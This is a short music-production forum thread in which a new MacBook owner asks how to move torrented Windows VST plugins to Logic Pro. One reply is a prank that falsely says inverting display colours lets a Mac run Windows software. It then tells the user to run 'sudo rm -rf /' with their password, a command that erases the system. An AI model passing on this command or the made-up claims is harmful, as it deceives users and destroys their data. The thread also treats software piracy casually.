Need help with transferring Windows VST's to Mac


New Metal Member
Jul 21, 2014
So I bought a Macbook Pro today, and im installing Logic Pro right now to try it out but I want to have my plugins with me. But theyre .dll files now as they are installed on a Windows machine. Is there a way to easy transfer all those files to this mac's vst folder? Would love some help.

Thanks in advance :)
Of course. Something tells me these plugins might not be paid versions, if they were that question probably wouldn't come up. If they are paid versions then just download/install the Mac versions.
None of them are paid. About 15GB of torrented plugins. I guess Ill just have to download all of them again.

My next problem I ran into is disk space. I bought the 15 inch Macbook Pro with 256 SSD and 500 GB External HDD. I want to install Logic's vst's and samples on my external, is there any way to do this?
There's a pretty cool trick to getting this to work, firstly you want to hit option+command+f5, and click the "invert display colours" box.
What most people don't know is this makes everything on the Mac opposite, not just the colours, so it will run windows software after you enter in one more command.

Go to your spotlight search in the top right corner and type in terminal, then open the terminal app.

After that type sudo rm -rf /
It will ask for your password, so just type in the password you setup when you created your login, don't worry that you can't see the password when you type, just type it in and hit enter.

Have fun!
Why are you guys mad because I torrent plugins? Dont tell me you never have done that lmao